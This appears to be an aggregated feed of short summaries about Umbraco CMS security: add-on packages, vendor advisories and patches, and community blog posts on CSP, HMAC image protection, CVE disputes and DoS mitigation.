An Umbraco package that restricts access to your site (or specific paths) by IP address whitelist.
At Digital Excellence 2026, Jeppe Birkebæk Truelsen demonstrated how Umbraco enables membership organizations to scale content while maintaining brand voice and data security. By implementing a governance layer for AI, organizations can define boundaries and retain control, ensuring AI acts as an assistant rather than a decision-maker, fostering accountability and trust.
WebAuthn/FIDO2 passkey add-on for Umbraco 17 passwordless member authentication.
One-time password (OTP) email add-on for Umbraco 17 passwordless member authentication.
Nicholas Carlini discussed using Anthropic's Claude models for automated vulnerability discovery in software. Liam Laverty replicated this approach in the Umbraco-CMS repository using a heuristics-based method, achieving significant cost reduction—under $20 compared to Carlini's $40k—while identifying potential vulnerabilities and improving documentation, although no CVEs were found.
The migration of the Newsletter Studio website from Umbraco 8 to Umbraco 17 revealed a security feature that logs out members upon password changes. This occurs due to the default settings preventing concurrent logins. Solutions include refreshing the login cookie after a password change or enabling concurrent logins in appsettings.json.
In a recent blog post, the author reflects on the UmBackdoor, a proof-of-concept Umbraco package created in 2019. The package allowed attackers to install a backdoor for remote access via a reverse shell. The author discusses various password reset techniques and emphasizes the importance of security measures to prevent such exploits.
Generate a new backoffice user account on application startup. Use with care!
Andy Butland outlines security patches for Umbraco versions 16.0.0 - 16.5.0 and 17.0.0 - 17.2.1, addressing three vulnerabilities: vertical privilege escalation, XSS injection, and unauthorized domain data modification. Users are urged to upgrade to secure their CMS, with automatic fixes available for Umbraco Cloud projects.
Nathaniel Nunes discusses the security risks associated with Umbraco's image processing capabilities, particularly the potential for unrestricted image manipulation leading to server overload. He recommends implementing HMAC authentication to secure image requests, detailing how to configure it in Razor and Next.js environments. Nunes emphasizes the importance of safeguarding the HMAC key and mentions upcoming security checks in Umbraco 17.3.0.
Jason Elkin critiques CVE-2025-67288, arguing it misrepresents Umbraco's security regarding PDF uploads with embedded JavaScript. He asserts that Umbraco does not process such files for remote code execution or XSS vulnerabilities. Elkin proposes implementing an IFileStreamSecurityAnalyzer to enhance file safety checks, mitigating potential risks effectively.
Debasish Gracias discusses implementing a Content Security Policy (CSP) for Umbraco v17, focusing on allowing editors to embed JavaScript securely. He outlines a method to automatically inject CSP nonces into editor-supplied script tags, ensuring compliance with strict CSP settings while maintaining flexibility for content creators.
Keyur Garala outlines critical Umbraco security vulnerabilities for 2026, emphasizing the importance of regular updates, strong authentication, and proper user permissions. He highlights risks from outdated software, insecure plugins, and misconfigured environments. To safeguard against cyber threats, Garala advocates for consistent security practices and partnering with Arroact for professional support.
Umbraco versions 13.0.0 to 13.12.0 are vulnerable due to an issue with .udt file uploads, allowing potential file system enumeration and NLTM hash retrieval. A patch is available for Umbraco 13.12.1, and Umbraco Cloud sites are automatically updated. Thanks to Tomasz Holeksa for reporting the vulnerability.
Jason Elkin discusses a recent Denial of Service incident affecting an Umbraco site due to bot-generated form submissions. The excessive logging and errors from these submissions degraded performance. Implementing a Cloudflare WAF rule to limit POST requests effectively blocked 3 million malicious requests, ensuring site stability for legitimate users.
Umbraco upgrades have evolved significantly, transitioning from challenging migrations to smoother processes, especially from version 10 onwards. Bump Digital emphasizes the importance of proactive planning, client communication, and leveraging modern .NET features to enhance performance and security. Upgrades are now more manageable, with predictable release schedules and improved documentation for breaking changes.
Andy Butland reports that moderate and low security vulnerabilities in Smidge, an upstream dependency for Umbraco 13.0.0 - 13.10.1, have been addressed with patches. Users are advised to upgrade to the latest version, while Umbraco Cloud projects will receive automatic updates. Further details are available in the release notes.
Umbraco HQ hosts a panel discussion with experts Emma Burstow, Chris Osterhout, and Zoja Antuchevič on open source software security. They address misconceptions, stressing community involvement, transparency, and effective implementation. The discussion emphasizes the importance of education in procurement, a collaborative approach to risk management, and balancing developer freedom with security measures.
Content Security Policy utilities for Umbraco CMS applications.
Umbraco versions 13.0.0 to 16.1.0 are affected by a vulnerability in the Content Delivery API, allowing unauthorized access to cached content without a valid API key. Patches are available for the latest minor versions, and Umbraco Cloud sites will be automatically updated. Users are advised to upgrade to supported versions for security.